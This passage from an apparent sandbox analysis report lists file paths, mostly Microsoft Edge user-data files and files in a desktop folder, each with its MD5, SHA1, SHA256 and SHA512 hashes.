| SHA512 | 075ddcaee767faa78a328f49e6b0db0e6228863e5337f67f94b99f6539b77c84e8e06d41eb1a9ec60be8d2834956e8024d8aede0cc0595370a620ff5106299e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c4d5616fd488cd1d16219b83502985b6 |
| SHA1 | bd81cc836258544a5926482e844b1d0c2045143a |
| SHA256 | e042e991bb9392e84d0d52b5b9c4cfd98a2cf59297f3e222b7493faee4a16828 |
| SHA512 | 02c0a53e39c0c8962d2886e6a1edcbc5c7082598177f8452e32b7d7bc7b65f8c52dba00fb0696ec8b235c4964d84bdb4e3ed515804fbd0fe30efb05b2d329954 |
C:\Users\Admin\Desktop\New folder\LOG
| MD5 | fdff3e6f65c2cf233a35eb4ff0852281 |
| SHA1 | 396a2c3c7afae1ce6373503f16702e24fc6eeea3 |
| SHA256 | 792d3fdde42d378a85b536cfd909ba354f27b7e1ac30a0ad874fb46e721ae8c4 |
| SHA512 | 71a2e9788d17420adc039810749e4ed74177d91526ecd32a0028027baef566b0fc011314dd9220be113b352e9b93bb2c7c2525e4798d337454b29ec57584e6a1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8864ce8cb1efe60c714bef47f00b96c1 |
| SHA1 | c5f24da7d6feac21456eeeb903667aadd6d848b4 |
| SHA256 | 5682937f84f03a001aa006753df9f03aadd252f56ac118371e60f85ec2776881 |
| SHA512 | 01bb64270f2233316f3e458b8ef9856e3584d2c83a3e132439e19c9a6e9d57226d34825401c9fd62ecb7958308248367774c9a31d11b1582d415c20192597b28 |
C:\Users\Admin\Desktop\New folder\History Provider Cache
| MD5 | 992b295d9ca3adbbcaedd0257c950583 |
| SHA1 | 7f72db0ba76602eb76c08339ab0e44b35db48440 |
| SHA256 | 1a0184002df62bf897acacf966013515cc6da9c820490b462399af3b96b4b31d |
| SHA512 | 36f0544abe7131022dad39b2a08ea1b95dbddcad933183b6253a8d8151bfc119fe3390f9bb96a75e5a01da16877bdfc13a271dc7e1456c35107425fd19b5ad36 |
C:\Users\Admin\Desktop\New folder\LOG
| MD5 | 6988afb71ceb462a49b09b65a4278abf |
| SHA1 | 7f018177c6e620a5d992d3b2404bc96d7beb3b48 |
| SHA256 | a8e9d4335f7984388af6959b5d4997735571e030e4cc3809375ec8e43df62447 |
| SHA512 | b14e990a2fc2d994b62f5da6d2aef58041a4b3fbf1416d9894c7f34a80dd5baf0e99b9085dcd3c9af4cead1d51f5bbb36e878c59c1413a6f6310f8d06e72e2af |
C:\Users\Admin\Desktop\New folder\f_000023
| MD5 | 1435f3cfd01bf0f3c24b8983e6780db0 |
| SHA1 | 439ab7ffa6f9d5b654710691d8736eedf2b6e892 |
| SHA256 | 8cd3f9f312e86bade2e77eb25c28eba805707909441d49e29288944677ce6d47 |
| SHA512 | dded0517b2c8f6c6ea045ba87f3ae870df63843291c3e2219e7bdeb4e33baf360b5fdb6065f0566fd1c79253105574ee4ca8cb13a11f7e6a51bf20eacf03155b |
C:\Users\Admin\Desktop\New folder\f_000024
| MD5 | adb9c8396458ab79976763b8d0839950 |
| SHA1 | cfb7f5618c450788edafc7f5962cdd7e7c098eea |
| SHA256 | 95927cd66a1def9f05939638eb57d2867b9d2cd036f76bad518dd21e21be43c2 |
| SHA512 | 3292317824fb02d38b20bfc0eb3e3ea7546b26ddcb942138051af44babae7f2a773336146ac916523f385500c8a6ba438f57e91f9f110a67ce3a16c2f10f6311 |
C:\Users\Admin\Desktop\New folder\f_000025
| MD5 | a13eff562c0d1002b9608fd1451e3bee |
| SHA1 | 9a62ace5329fed074df185a87ad4d11ff5a31366 |
| SHA256 | bec611b7ff68a19f3f244c4a542d77a3355119c6f405d206a6e212282e83e529 |
| SHA512 | b9a3811834a9e99bf3494f144a38dcc51dc2f044844d1e52c8a7c8b4260a13f943ba0a81d26e296f84ad337cedf3a64c950c52646227280720ff18731bea9ffc |
C:\Users\Admin\Desktop\New folder\f_000027
| MD5 | d486d861aa55d81e65a6141275b601f8 |
| SHA1 | 9243cbbd89c0ca538db6d7efc3b660178fbe0308 |
| SHA256 | 6bc54d94cd730657cf441eb7acbd946fe71bf7ca3779a65d576bcd8bbcbe2fda |
| SHA512 | 48f6c0d3b2bcd17b4dad48b5a542fc06a2f740b6dbd40edf9aef1636aef98554bf2c6c83a6656cbb6e8a1f1864eb4b62947a536021cd4a5fa23642b048bb03fd |
C:\Users\Admin\Desktop\New folder\f_000029
| MD5 | 8a3e224112e4cbc5ecbc77cd895dc837 |
| SHA1 | 14c25be02a341acbf531b30d881a603928505b60 |
| SHA256 | a92bf28dec378db94e890154019d9fb5aba300bc6d2c01e0b80038b55f09e08d |
| SHA512 | d7ab71864b32e6f7b53d26722531513179ac4c22083ff4c84b77a6c892f6015228e9790eb3f93743f47793645f2f6dafb3d0684b3678ff94f847613c6a21e9b4 |
C:\Users\Admin\Desktop\New folder\f_000028
| MD5 | 0d29e473a4d6090477d4c75514f6a10b |
| SHA1 | 40dc256a834593f30ad510fd7bcbc09ef639ad59 |
| SHA256 | efee71c651065429455fb75f3a8dd137f216a1837cb6511ff9374c35821ef996 |
| SHA512 | 40e4dcdcf1e76cce29dcebe3cc3a22eea7125adcd3a53d518ffe1fe5d32c0b8eedc98df509d80daf5e99ec930015ace375e1a46f72d24385950337229666f637 |
C:\Users\Admin\Desktop\New folder\f_000026
| MD5 | d42b9fb0ecb9657557d0335725184f3c |
| SHA1 | c74e54a0aec45839a4c4502ece52cc7b1f13ed57 |
| SHA256 | 4e60d55681fa31df00b9fa3a9b86a5e36a0d31ea401b50c6575ae0d14dc644df |
| SHA512 | 458bfbb712eed3c54c50905a8b699c4c69105f0ec16e9ea26b788ab065660477fed852ae3fcc70f124af2d56c843975103d91e00d2fbc30c1af64ba9f77caa4e |
C:\Users\Admin\Desktop\New folder\f_00002a
| MD5 | b7429f34c431ed9c9cca2b42ab3336ff |
| SHA1 | 6b140b25d9bb837125a5f6a3556a40e81f8e03d2 |
| SHA256 | 6768f234d60f63db21c87e257c7aace5b5c97274197ee655b8d7c319d6214ef2 |
| SHA512 | 4f17f9ed2084466e7c90f4356bbffe4ceeb64671711a47d346ad341753a2558bc462787f268889d86324f2795dea0f0ca6b7e821d256eae034ec7dbebf256f5d |
C:\Users\Admin\Desktop\New folder\MANIFEST-000004
| MD5 | 031d6d1e28fe41a9bdcbd8a21da92df1 |
| SHA1 | 38cee81cb035a60a23d6e045e5d72116f2a58683 |
| SHA256 | b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da |
| SHA512 | e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Desktop\New folder\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001f.db
| MD5 | f220cbecef8b94838a60bcfadfd79905 |
| SHA1 | 04e6dc5b53ecd1bae4ad2f22ef852dbd9b5d823a |
| SHA256 | 36194dfb4dffeff8bc3ba740a7a6a576fc481cbaf5b800fcf266b18e859a42ee |
| SHA512 | 5d8cefc6ba178f32cd22b68cbabb6f5b706219afcaef74a8199fd5383bec9adcfc026d0e759b03f1c4d76edf7bc7d112f1c45deca47d61667d7f35c47ef59efe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 93b5df3f9f24c15c9f5cdcb275031561 |
| SHA1 | 42f6c3ffd21a32955d97fb6f463b177e7a765e09 |
| SHA256 | 9803080ea989ff8cc7af13518db3983b95034e4e2b78ac8386d3adab92d8db60 |
| SHA512 | 35f9ad2ac93af1683b21ea72d9dd9b60a0f50afeba3150838c42a16caa7ae2db157fcc2fc3763f75d22658312976254b646a46bd46cd060ffc64149ae3b40967 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9a454ff1e99d7e6a9cc7bc82fc9f8f1d |
| SHA1 | 2413852e2ff15c06c97b99c47ff01e174c232b3a |
| SHA256 | 93b40e5d293e66311e5eb3d7643289f1cbf16407e076c72596abcab6fe371fcc |
| SHA512 | cf533ae335cd6c443c50d2d263d438bb6442ee3cc1b083074eab98f2f74ef57325e573b35e86ff9c4ba443d75adf7168e70b14932da08578c9f25565f91b01d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 88d643aa1f1d7d897af01a718760341b |
| SHA1 | 8582e71a549b19d5f588d1220e0a37a9861c951d |
| SHA256 | ff56779ea5f506709cc67aeb2c0368132c48d47b11d5b44f5b137a2d697db694 |
| SHA512 | 7c3437759c2cdda186960dd5a802033e3c624464c30464cd6c0a77559d912d14abbcb9848277cde6eb66294a26ce805ca0fae9474ffed80c981b196d333190ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | e1be8a07a59a4a914bb5dcdd6176b29e |
| SHA1 | e03cf561f56c4fd5b1669cdf41ee29a44411c1f5 |
| SHA256 | 26b06dcbfea6379750b2b2b215f8aea5601451511cde63949d5ffc5ecabe9bd4 |
| SHA512 | 0acd3bfc6c906b16ea6ceb28b36f1c842f184ed173f9d971c89f34c2a6d6291440e4aef8d9e4c53fe0fb6dd160ee923c234bd72526c37c938fb39d5740c6a18f |
C:\Users\Admin\Desktop\New folder\edge_shutdown_ms.txt
| MD5 | 291e2991bf76a34e7a515a03f5d2b583 |
| SHA1 | 6f56d440ed988447d8ac7642c4f5e42c0f75717f |
| SHA256 | 601dbe38972175e4a0c315605683b7422e178abc1f1960dde4dc95bfdd68b717 |
| SHA512 | 30ef328563adba1ecf921fe3a948d6fb6528d2696046a996f32eb86131224405c3bc1b86d9179134e3c5a0bd1630c4dedf8923e24bc4f57f240a88fc992acdbe |
C:\Users\Admin\Desktop\New folder\Apps.index
| MD5 | b9a9ab323ce6acec82ab5e2257afa54a |
| SHA1 | 8045c6f268575dcd1e3672ecb10451e2d44b41d8 |
| SHA256 | d4adcbc138abd89d70ee4ad21c7d9eead32a4fe6d6dd68f99392d563279d95ee |
| SHA512 | dff391e28cd35d3dfc72cc652bf514843eb3999a72b32288557f6e39728814931ad87860acedaf2b0df38496b505dee4af0f9ad23741a59b5da0298acfe4577b |
C:\Users\Admin\Desktop\New folder\0.0.filtertrie.intermediate.txt
| MD5 | efe68bceb5e2d4bbfd343a6ad51f39dd |
| SHA1 | b964d9af46a435e7243945a2242ee3e303fb0844 |
| SHA256 | 198324374d879b0ff4ba50617d4adaad5368fff7fb76f2b36d76aefeb29b79f2 |
| SHA512 | c1fe4568227453658868ac33df499fc69b065bcd81da52955283bf3971dc1aac91652e69db55291e5e574597b31959068e24680420416debcda5e6db3bdbe6c4 |
C:\Users\Admin\Desktop\New folder\0.1.filtertrie.intermediate.txt
| MD5 | 34bd1dfb9f72cf4f86e6df6da0a9e49a |
| SHA1 | 5f96d66f33c81c0b10df2128d3860e3cb7e89563 |
| SHA256 | 8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c |
| SHA512 | e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96 |
C:\Users\Admin\Desktop\New folder\0.2.filtertrie.intermediate.txt
| MD5 | c204e9faaf8565ad333828beff2d786e |
| SHA1 | 7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1 |
| SHA256 | d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f |
| SHA512 | e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8 |
C:\Users\Admin\Desktop\New folder\Apps.ft
| MD5 | 84ac0c242b77b8fc326db0a5926b089e |
| SHA1 | cc6b367ae8eb38561de01813b7d542067fb2318f |
| SHA256 | b1557167a6df424f8b28aabd31d1b7e8a469dd50d2ae4cbbd43afd8f9c62cf92 |
| SHA512 | 8f63084bd5a270b7b05e80454d26127b69bcb98ec93d9fad58d77203934f46b677a3aaf20f29e73dcd7035deb61f4c0aa3b10acbc4c0fc210632c1d74f705d2f |